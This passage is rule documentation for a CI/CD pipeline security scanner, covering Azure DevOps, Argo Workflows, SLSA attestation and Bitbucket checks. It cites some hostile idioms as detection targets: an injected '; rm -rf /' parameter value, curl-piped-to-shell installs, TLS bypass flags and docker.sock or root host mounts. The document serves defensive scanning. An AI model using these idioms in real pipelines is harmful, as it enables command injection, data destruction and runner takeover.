ADO-027: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Complements ADO-002 (script injection from untrusted PR context). Fires on intrinsically risky shell idioms, eval, sh -c "$X", backtick exec, regardless of whether the input source is currently trusted.

Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate any value that must feed a dynamic command at the boundary.

Known false positives.

  • eval "$(ssh-agent -s)" and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged, the substituted command is literal, only its output is eval'd.

Source: ADO-027 in the Azure DevOps provider.

ADO-028: Package install bypasses registry integrity (git / path / tarball source) MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Complements ADO-021 (missing lockfile flag). Git URL installs without a commit pin, local-path installs, and direct tarball URLs bypass the registry integrity controls the lockfile relies on.

Recommendation. Pin git dependencies to a commit SHA. Publish private packages to an internal registry (Azure Artifacts) instead of installing from a filesystem path or tarball URL.

Source: ADO-028 in the Azure DevOps provider.

ADO-029: Service-connection-using job without environment or branch gate HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Pairs with IAM-008 (the AWS-side OIDC rule). Azure's equivalent trust path runs through service connections that map to Azure AD federated identity credentials. The ADO-side gate is either a deployment + environment or a branch-pinned condition; this rule flags jobs that have neither.

Recommendation. Every job that consumes an Azure service connection (via AzureCLI@, AzurePowerShell@, AzureKeyVault@, AzureWebApp@, etc.) must either be a deployment: job bound to an environment: (which carries approval checks and audit) or carry a condition: that pins Build.SourceBranch to a protected ref. Without one of those gates, any branch push drives the federated assume-role on Azure AD.

Source: ADO-029 in the Azure DevOps provider.

ADO-030: pool interpolates attacker-controllable value HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. ADO-013 catches self-hosted pools that aren't ephemeral; this rule catches the upstream targeting choice. When pool: (or its name / demands sub-fields) is computed from an attacker-controllable expression, whoever triggers the pipeline picks where the job runs, including any agent pool the project exposes (deploy-prod, signer, hsm …). Two attacker surfaces are flagged: runtime SCM macros ($(Build.SourceBranchName), $(System.PullRequest.SourceBranch), …) and caller-controlled template parameters (${{ parameters.X }}, the value comes from whoever queued the run). The rule walks all three pool shapes, string scalar, dict { name, vmImage, demands }, and the demands list form.

Recommendation. Hard-code pool: to a specific agent pool name (or vmImage: for Microsoft-hosted). If pool selection has to be parameterised, validate the candidate against an explicit allowlist before the job runs (e.g. a condition: guard against a vetted set), and never inline $(Build.*) / $(System.PullRequest.*) / ${{ parameters.X }} values as the pool name or as a demand.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Pipelines that intentionally select agent pools via a vetted variables: block (POOL_NAME: prod-pool) are out of scope, pipeline variables defined in the same file are author-controlled. Static custom names are not flagged. The rule only matches the curated runtime-macro catalog and the literal ${{ parameters.X }} template-parameter shape.

Source: ADO-030 in the Azure DevOps provider.

ARGO-001: Argo template container image not pinned to a digest HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Walks spec.templates[].container, spec.templates[].script, and spec.templates[].containerSet.containers[]. The image must contain @sha256: followed by a 64-char hex digest.

Recommendation. Pin every container / script template image to a content-addressable digest (alpine@sha256:<digest>). Tag-only references (alpine:3.18) and rolling tags (alpine:latest) let a compromised registry update redirect the workflow's containers at the next pull, with no audit trail in the WorkflowTemplate.

Source: ARGO-001 in the Argo Workflows provider.

ARGO-002: Argo template container runs privileged or as root HIGH

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Detection fires on securityContext.privileged: true, runAsUser: 0, runAsNonRoot: false, allowPrivilegeEscalation: true, or no securityContext block at all. Also walks spec.podSpecPatch (raw YAML) for an explicit privileged: true token.

Recommendation. Set securityContext.privileged: false, runAsNonRoot: true, and allowPrivilegeEscalation: false on every template container / script. A privileged container shares the node's kernel namespaces; a malicious image then has root on the build node and breaks the boundary between workflow and cluster.

Source: ARGO-002 in the Argo Workflows provider.

ARGO-003: Argo workflow uses the default ServiceAccount MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Applies to Workflow and CronWorkflow. WorkflowTemplate / ClusterWorkflowTemplate are exempt because the SA is set on the run that references them. An explicit serviceAccountName: default is treated the same as omission.

Recommendation. Set spec.serviceAccountName (or spec.workflowSpec.serviceAccountName for CronWorkflow) to a least-privilege ServiceAccount that carries only the secrets and RBAC the workflow needs. Falling back to the namespace's default SA grants access to whatever cluster-admin or wildcard role someone later binds to default, a privilege-escalation surface that should never be load-bearing for workflow pods.

Source: ARGO-003 in the Argo Workflows provider.

ARGO-004: Argo workflow mounts hostPath or shares host namespaces CRITICAL

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Walks spec.volumes[].hostPath and the raw spec.podSpecPatch string for hostNetwork, hostPID, hostIPC, and hostPath.

Recommendation. Use emptyDir or PVC-backed volumes instead of hostPath. Drop hostNetwork: true / hostPID: true / hostIPC: true from any inline podSpecPatch. A hostPath mount of /var/run/docker.sock or / lets the workflow break out of the pod and act as the underlying node.

Source: ARGO-004 in the Argo Workflows provider.

ARGO-005: Argo input parameter interpolated unsafely in script / args CRITICAL

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Fires on any {{inputs.parameters.X}}, {{workflow.parameters.X}}, or {{item.X}} token inside a script.source body or a container.args string that isn't already wrapped in quotes. Doesn't fire on the env-var indirection pattern, which is safe.

Recommendation. Don't interpolate {{inputs.parameters.<name>}} directly into script.source or container.args. Argo substitutes the value before the shell parses it, so a parameter containing ; rm -rf / runs as shell. Pass the parameter via env: (value: '{{inputs.parameters.<name>}}') and reference the env var quoted in the script ("$NAME"); or use inputs.artifacts for file payloads.

Source: ARGO-005 in the Argo Workflows provider.

ARGO-006: Literal secret value in Argo template env or parameter default CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene, CICD-SEC-7 Insecure System Configuration.

How this is detected. Strong matches: AWS access keys, GitHub PATs, JWTs. Weak match: env var name suggests a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) and the value is a non-empty literal rather than an interpolation.

Recommendation. Mount secrets via env.valueFrom.secretKeyRef (or a volumes: Secret mount) instead of writing the value into env.value or arguments.parameters[].value. Workflow manifests are committed to git and cluster-readable; literal values leak through normal access paths.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ARGO-006 in the Argo Workflows provider.

ARGO-007: Argo workflow has no activeDeadlineSeconds LOW

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Applies to Workflow, CronWorkflow, WorkflowTemplate, and ClusterWorkflowTemplate. The field can sit at the workflow level or on individual templates.

Recommendation. Set spec.activeDeadlineSeconds (or spec.workflowSpec.activeDeadlineSeconds on a CronWorkflow) so a hung step can't pin the workflow controller's reconcile cycle indefinitely. Pick a value generous enough for the slowest legitimate run (e.g. 3600 for a typical pipeline, 21600 for ML training). Per-template activeDeadlineSeconds is also accepted as evidence of intent.

Source: ARGO-007 in the Argo Workflows provider.

ARGO-008: Argo script source pipes remote install or disables TLS HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Walks script.source and joined container.args text with the cross-provider CURL_PIPE_RE and TLS_BYPASS_RE regexes.

Recommendation. Replace curl ... | sh with a download-then-verify-then-execute pattern. Drop TLS-bypass flags (curl -k, git config http.sslverify false); install the missing CA into the template image instead. Both forms let an attacker controlling DNS / a transparent proxy substitute the script the workflow runs.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ARGO-008 in the Argo Workflows provider.

ARGO-009: Artifacts not signed (no cosign/sigstore step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Detection mirrors GHA-006 / TKN-009 / BK-009, the shared signing-token catalog (cosign, sigstore, slsa-github-generator, slsa-framework, notation-sign) is searched across every string in each Argo document. Fires only on artifact-producing Workflows / WorkflowTemplates (those that invoke docker build / docker push / kaniko / helm upgrade / aws s3 sync / etc.) so lint-only Workflows don't trip it.

Recommendation. Add a cosign step to the Workflow. The most common shape is a final sign template that runs cosign sign --yes <repo>@sha256:<digest> after the build. Sign by digest, not tag, so a re-pushed tag can't bypass the signature.

Source: ARGO-009 in the Argo Workflows provider.

ARGO-010: No SBOM generated for build artifacts MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer did this CVE ship? for a given artifact. Detection uses the shared SBOM-token catalog: syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool. Fires only on artifact-producing Workflows.

Recommendation. Add an SBOM-generation template. syft <artifact> -o cyclonedx-json > /tmp/sbom.json runs in any standard container; cyclonedx-cli and cdxgen are alternative producers. Persist the SBOM as an output artifact so downstream templates and consumers can read it.

Source: ARGO-010 in the Argo Workflows provider.

ARGO-011: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, witness run, attest-build-provenance).

Recommendation. Add a cosign attest --predicate slsa.json --type slsaprovenance <ref> step after the build template, or use witness run to record the build environment. Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.

Source: ARGO-011 in the Argo Workflows provider.

ARGO-012: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM. It answers does this artifact ship a known CVE? rather than can we verify what it is?. Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, osv-scanner, govulncheck, anchore, codeql-action, semgrep, bandit, checkov, tfsec. Walks every Argo document and passes if any document includes a scanner reference.

Recommendation. Add a vulnerability scanner template. trivy fs /workdir for source / filesystem; trivy image <ref> for container images. grype, snyk, npm audit, pip-audit are alternatives. Fail the template on findings above a chosen severity so a regression blocks the merge instead of shipping.

Source: ARGO-012 in the Argo Workflows provider.

ARGO-013: Argo workflow does not opt out of SA token automount MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-7 Insecure System Configuration.

How this is detected. Companion to ARGO-003 (default ServiceAccount). The default SA only matters when its token is mounted; an explicit automountServiceAccountToken: false removes the token from the pod regardless of which SA the pod is bound to. Detection: workflow passes when the spec sets it to false AND every template either inherits that or sets its own automountServiceAccountToken: false. A template with it explicitly true (or unset against an unset spec-level value) is the failing shape.

Recommendation. Set spec.automountServiceAccountToken: false on the Workflow / WorkflowTemplate, or per-template (templates[].automountServiceAccountToken: false) on any template that doesn't need to talk to the Kubernetes API. An explicit false keeps a compromised step from using the workflow's SA token to escalate inside the cluster, even when the SA itself is hardened (ARGO-003), a token automounted into every pod widens the leak surface.

Known false positives.

  • Templates that genuinely need to call the Kubernetes API (GitOps pull, kubectl apply from inside the workflow). Set automountServiceAccountToken: true on that template specifically and bind it to a least-privilege SA, the rule then fires only on the broad spec-level absence, which is the actual gap.

Source: ARGO-013 in the Argo Workflows provider.

ARGO-014: Argo template script runs unpinned package install MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detection reuses the cross-provider primitives PKG_INSECURE_RE and PKG_NO_LOCKFILE_RE from checks/base.py. Same rule pack already exists for GHA (GHA-021 / GHA-022), GitLab (GL-021 / GL-022), Bitbucket / Azure DevOps / Jenkins / CircleCI / Cloud Build / Buildkite / Tekton / Drone. Argo was a gap; this closes it.

Walks script.source plus joined container.args / container.command text per template. Steps and tasks across DAG / steps templates are equally in scope because they all reduce to a container with a shell payload.

Recommendation. Pin every package install to a lockfile or a checksum-verified version. npm ci (not npm install), yarn install --frozen-lockfile, pip install -r requirements.txt --require-hashes, bundle install --frozen. Don't use --trusted-host / --no-verify / a non-HTTPS index URL — those bypass TLS or trust validation entirely (ARGO-008 covers the TLS subset; this rule covers the lockfile subset).

Known false positives.

  • Bootstrap-stage installs that intentionally pull latest (apt-get install -y curl for a tooling image rebuild) sometimes legitimately bypass the lockfile. Suppress via ignore-file scoped to the specific template name.

Source: ARGO-014 in the Argo Workflows provider.

ARGO-015: Input artifact pulls from an insecure (non-HTTPS) URL HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Argo Workflows resolves input artifacts before the template's container starts. The source can be http, git, s3, gcs, azure, hdfs, oss, or raw. The rule fires when:

  • http.url starts with http:// (cleartext fetch)
  • git.repo starts with git:// (legacy unauthenticated git protocol, no integrity)
  • s3.endpoint is set with insecure: true (explicit TLS bypass)

Other artifact sources are skipped, an OCI / S3 / GCS pull carries its own integrity / signing posture that lives outside this rule.

Recommendation. Pull every input artifact over HTTPS. Replace http:// with https:// in any http.url: block, and use https:// git remote URLs instead of git://, ssh://-without-key-pinning, or anonymous-cleartext access. Plain HTTP fetches let any on-path attacker swap the artifact bytes for a different payload, and Argo will execute whatever bytes arrive without an integrity check unless the artifact source provides one (S3 + checksum, OCI + digest). If the artifact source genuinely doesn't ship over HTTPS (a legacy internal mirror), wrap it in a CDN or proxy that adds TLS, then pin the artifact by checksum on the consuming side.

Known false positives.

  • Local-mirror development workflows occasionally use http:// against an internal registry that's only reachable from a private network. The integrity guarantee still relies on network isolation rather than transport encryption; suppress on the specific template name when this is the deliberate shape.

Source: ARGO-015 in the Argo Workflows provider.

ATTEST-001: SLSA provenance attests an untrusted builder identity HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Reads the SLSA provenance from each in-toto Statement carried in the image's attestation manifests, then checks predicate.builder.id (SLSA v0.2) / predicate.runDetails.builder.id (SLSA v1) against an allowlist of URI prefixes for hosted CI builders. Fires when the attested builder is unknown or matches a self-hosted-runner shape.

Triggering this rule means the bytes of the runtime image were produced by a builder identity the SLSA contract cannot vouch for. A compromised self-hosted runner can produce a perfectly-formed, signature-valid attestation for a tampered image, so a passing OCI-002 (attestation present) is not the same thing as a trustworthy attestation, this rule is the difference.

Recommendation. Re-run the build on a recognized hosted CI builder (GitHub-hosted runners, slsa-github-generator, Cloud Build, GitLab SaaS, Buildkite, or BuildKit attesting via Docker Hub) so the SLSA builder.id claim resolves to an isolated, publicly-auditable build environment. Self-hosted runners and unknown builder identities defeat the SLSA L2+ isolation guarantee, the supply-chain trust chain only extends as far as the builder the attestation names.

Known false positives.

  • Some teams run their own SLSA-conformant builders for policy reasons (air-gapped builds, regulated workloads, FedRAMP environments). Add the builder's URI prefix to a future allowlist override (deferred to v2) or suppress via ignore-file when the team has a documented review of the builder's isolation posture.
  • Older BuildKit versions emitted a generic placeholder (https://github.com/docker/buildx@v0.X) without tying the identity to the runner. Modern Buildx writes a concrete builder URI; if the scan flags a placeholder, upgrade Buildx and rebuild before treating it as a real incident.

Seen in the wild.

  • SLSA threat-model v1.0: untrusted builder is the canonical Build-track Threat #2 ('Build the package from a modified source'). A tampered self-hosted runner can emit a syntactically-valid attestation for the wrong source.
  • GitHub self-hosted runner advisory (CVE-2024-32004 et al.): self-hosted runners default to non-ephemeral, persisted state; a single fork-PR run gives the attacker arbitrary code execution that produces signed artifacts on every subsequent legitimate build. SLSA's isolation requirement (L2+) explicitly excludes this shape.

Source: ATTEST-001 in the OCI manifest provider.

ATTEST-002: SLSA provenance source-repo claim is missing or unverifiable HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. The builder.id claim that ATTEST-001 verifies tells you who built the image. The source-repo claim ATTEST-002 verifies tells you what they built. Both are required for the SLSA chain to be meaningful: a trusted builder running an unknown source produces a signed attestation for code you can't audit.

The rule walks the SLSA provenance predicate for a source URI. Path varies by spec version: - v0.2: predicate.invocation.configSource.uri - v1.0: predicate.buildDefinition.externalParameters (builder-specific, commonly .workflow.repository or .source.uri) Fires when: - no URI is present anywhere on the expected paths; - the URI is a known placeholder (empty, ?, unknown, n/a); - the URI doesn't parse as a recognizable VCS / HTTPS shape; - a URI is present but the corresponding digest field is missing or all-zeros (the bytes aren't actually pinned).

Recommendation. Ensure the build emits SLSA provenance with a concrete source-repo URI plus a commit-level digest. For SLSA v0.2 that's predicate.invocation.configSource.uri + configSource.digest (typically sha1 for git refs). For SLSA v1, predicate.buildDefinition.externalParameters should name the workflow's source repository, and predicate.buildDefinition.resolvedDependencies should include the same source pinned by digest. A missing or placeholder URI ('', 'unknown', 'n/a') leaves consumers unable to confirm what code produced the image.

Known false positives.

  • Some SLSA Phase-0 attestations omit the digest field on purpose, the build was reproducible-by-source rather than pinned to a commit. Suppress via ignore-file when the team has documented this trade-off; the default expectation for any image promoted to a production registry is a concrete commit pin.
  • Builders that emit free-form externalParameters shapes (some self-hosted SLSA implementations) may carry the source URI under a non-canonical key. The rule walks every string value in externalParameters looking for a VCS URI; if none is found, the finding fires. Add the builder to a future allowlist override (deferred) when the shape is intentional.

Seen in the wild.

  • SLSA threat-model v1.0, Source-track Threat #4 ('Build uses unauthorized source'): a builder pulling code from a fork or a different ref than the operator believes produces an attestation that signs the wrong bytes.
  • SolarWinds Orion compromise (December 2020): the build system pulled tampered source from an unauthorized branch via SUNSPOT, producing 'authentic' signed builds for code the development team never wrote. A pinned, verified source-repo claim is the control SLSA L2+ requires specifically to detect this shape.

Source: ATTEST-002 in the OCI manifest provider.

ATTEST-003: SBOM contains floating-version dependencies MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. ATTEST-001 verifies the builder; ATTEST-002 verifies the source; ATTEST-003 verifies the contents of what was shipped. A signed SBOM that declares openssl version latest is worse than no SBOM, the signature gives the rot a stamp of approval. Vulnerability-scanning tooling that reads the SBOM produces false negatives because the version it queries CVE databases for is unstable.

Detection walks every SBOM attestation (predicate types starting with https://spdx.dev/Document or https://cyclonedx.org/bom) and checks each declared package's version field against a floating-shape regex. A package is considered pinned when its version matches a concrete release identifier (semver, calver, sha-style digest, or any git tag with at least one numeric component).

Recommendation. Pin every dependency in the SBOM to a concrete version (a released semver, a digest, or a tag-plus-commit pair). Floating values like latest, *, master, an empty string, or a bare major like v1 defeat the SBOM's purpose: a consumer can't reproduce or vulnerability-scan what they don't have a fixed version of. SPDX 2.x carries version under packages[*].versionInfo; CycloneDX uses components[*].version. Both fields are optional in the spec but operationally required for any meaningful SBOM consumption.

Known false positives.

  • Some SBOM emitters legitimately leave versionInfo empty for system-injected components the build couldn't resolve (e.g. glibc from the base image when the image was built without distro metadata). Suppress via ignore-file scoped to the manifest path when the SBOM was produced in a context that intentionally elides those entries; for production-bound images the expectation is full version coverage.
  • Source-only components (a Git repo bundled into a builder stage) sometimes carry the branch name in version. Long-term that's still a floating reference (the branch tip moves), so the rule fires by design; switch to tag+digest pinning before suppressing.

Seen in the wild.

  • Log4Shell downstream impact (CVE-2021-44228): organizations with SBOMs at the ready could ship patches in hours; those without (or with floating-version SBOMs) spent days auditing builds to discover what they actually shipped. The log4j-core@latest shape was the worst case — the SBOM said the right name but no consumer could pin which exact bytes were in production.
  • Common SBOM-quality findings (NTIA SBOM Minimum Elements report, 2021): version completeness consistently the lowest-scoring dimension across producers. Floating versions account for the bulk of unconsumed SBOMs in vulnerability-management pipelines.

Source: ATTEST-003 in the OCI manifest provider.

BB-001: pipe: action not pinned to exact version HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Bitbucket pipes are docker-image references. Major-only (:1) or missing tags let Atlassian/the publisher swap the image contents. Full semver or sha256 digest is required.

Recommendation. Pin every pipe: to a full semver tag (e.g. atlassian/aws-s3-deploy:1.4.0) or to an immutable SHA. Floating majors like :1 can roll to new code silently.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BB-001 in the Bitbucket provider.

BB-002: Script injection via attacker-controllable context HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. $BITBUCKET_BRANCH, $BITBUCKET_TAG, and $BITBUCKET_PR_* are populated from SCM event metadata the attacker controls. Interpolating them unquoted into a shell command lets a crafted branch or tag name can execute inline.

Recommendation. Always double-quote interpolations of ref-derived variables ("$BITBUCKET_BRANCH"). Avoid passing them to eval, sh -c, or unquoted command arguments.

Source: BB-002 in the Bitbucket provider.

BB-003: Variables contain literal secret values CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Scans definitions.variables and each step's variables: for entries whose KEY looks credential-shaped and whose VALUE is a literal string. AWS access keys are detected by value shape regardless of key name.

Recommendation. Store credentials as Repository / Deployment Variables in Bitbucket's Pipelines settings with the 'Secured' flag, and reference them by name. Prefer short-lived OIDC tokens for cloud access.

Source: BB-003 in the Bitbucket provider.

BB-004: Deploy step missing deployment: environment gate MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. A step whose name or invoked pipe matches deploy / release / publish / promote should declare a deployment: field so Bitbucket enforces deployment-scoped variables, approvals, and history.

Recommendation. Add deployment: production (or staging / test) to the step. Configure the matching environment in the repo's Deployments settings with required reviewers and secured variables.

Source: BB-004 in the Bitbucket provider.

BB-005: Step has no max-time, unbounded build MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Without max-time, the step runs until Bitbucket's 120-minute global default kills it. Explicit per-step timeouts cap blast radius and cost.

Recommendation. Add max-time: <minutes> to each step, sized to the 95th percentile of historical runtime plus margin. Bounded runs limit the blast radius of a compromised build and prevent runaway minute consumption.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BB-005 in the Bitbucket provider.

BB-006: Artifacts not signed MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Unsigned artifacts can't be verified downstream. Passes when cosign / sigstore / slsa-* / notation-sign appears in the pipeline body.

Recommendation. Add a step that runs cosign sign against the built image or archive, using Bitbucket OIDC for keyless signing where possible. Publish the signature next to the artifact and verify it at deploy time.

Source: BB-006 in the Bitbucket provider.

BB-007: SBOM not produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Without an SBOM, downstream consumers can't audit the dependency set shipped in the artifact. Passes when CycloneDX / syft / anchore / sbom-tool / Trivy-SBOM appears.

Recommendation. Add an SBOM step, syft . -o cyclonedx-json, Trivy with --format cyclonedx, or Microsoft's sbom-tool. Attach the SBOM as a build artifact.

Source: BB-007 in the Bitbucket provider.

BB-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Complements BB-003 (variable-name scan). BB-008 checks every string in the pipeline against the cross-provider credential-pattern catalog, catches secrets pasted into script bodies or environment blocks.

Recommendation. Rotate the exposed credential. Move the value to a Secured Repository or Deployment Variable and reference it by name.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed, if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.

Source: BB-008 in the Bitbucket provider.

BB-009: pipe: pinned by version rather than sha256 digest LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. BB-001 fails floating tags at HIGH; BB-009 is the stricter tier. Even immutable-looking semver tags can be repointed by the registry; sha256 digests are tamper-evident.

Recommendation. Resolve each pipe to its digest (docker buildx imagetools inspect bitbucketpipelines/<name>:<ver>) and reference it via @sha256:<digest>.

Source: BB-009 in the Bitbucket provider.

BB-010: Deploy step ingests pull-request artifact unverified CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Bitbucket steps declare artifacts on the producer and downstream steps implicitly receive them. When an unprivileged step produces an artifact and a later deployment: step consumes it without verification, attacker-controlled output flows into the privileged stage.

Recommendation. Add a verification step before the deploy step consumes the artifact: sha256sum -c artifact.sha256 against a manifest the producer signed, or cosign verify over the artifact directly. Alternatively, restrict the artifact-producing step to non-PR pipelines via branches: or custom: triggers.

Source: BB-010 in the Bitbucket provider.

BB-011: AWS auth uses long-lived access keys MEDIUM 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY values embedded in the pipeline file can't be rotated on a fine-grained schedule. Prefer OIDC or Bitbucket secured variables for cross-cloud access.

Recommendation. Use Bitbucket OIDC with oidc: true on the AWS pipe, or store credentials as secured Bitbucket variables rather than inline values. Remove static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from the pipeline file.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BB-011 in the Bitbucket provider.

BB-012: Remote script piped to shell interpreter HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a pipeline. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the build runner.

Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.

Source: BB-012 in the Bitbucket provider.

BB-013: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a pipeline give the container full access to the build runner, enabling container escape and lateral movement.

Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BB-013 in the Bitbucket provider.

BB-014: Package install from insecure source HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager invocations that use plain HTTP registries (--index-url http://, --registry=http://) or disable TLS verification (--trusted-host, --no-verify) in a pipeline. These patterns allow man-in-the-middle injection of malicious packages.

Recommendation. Use HTTPS registry URLs. Remove --trusted-host and --no-verify flags. Pin to a private registry with TLS.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BB-014 in the Bitbucket provider.

BB-015: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.

Recommendation. Add a vulnerability scanning step, trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.

Source: BB-015 in the Bitbucket provider.

BB-016: Self-hosted runner without ephemeral marker MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Self-hosted runners that persist between jobs leak filesystem and process state. A PR-triggered step writes to a well-known path; a subsequent deploy step on the same runner reads it. Detects runs-on: self.hosted without an ephemeral marker or Docker image override.

Recommendation. Use Docker-based self-hosted runners or configure runners to tear down between jobs. Add 'ephemeral' to runs-on labels or use Bitbucket's runner images that are rebuilt per-job.

Source: BB-016 in the Bitbucket provider.

BB-017: Repository token written to persistent storage CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Detects patterns where Bitbucket pipeline tokens are redirected to files or piped through tee. Persisted tokens survive the step boundary and can be exfiltrated by later steps, artifacts, or cache entries.

Recommendation. Never write BITBUCKET_TOKEN or REPOSITORY_OAUTH_ACCESS_TOKEN to files or artifacts. Use the token inline in the command that needs it and let Bitbucket revoke it after the build.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BB-017 in the Bitbucket provider.

BB-018: Cache key derives from attacker-controllable input MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

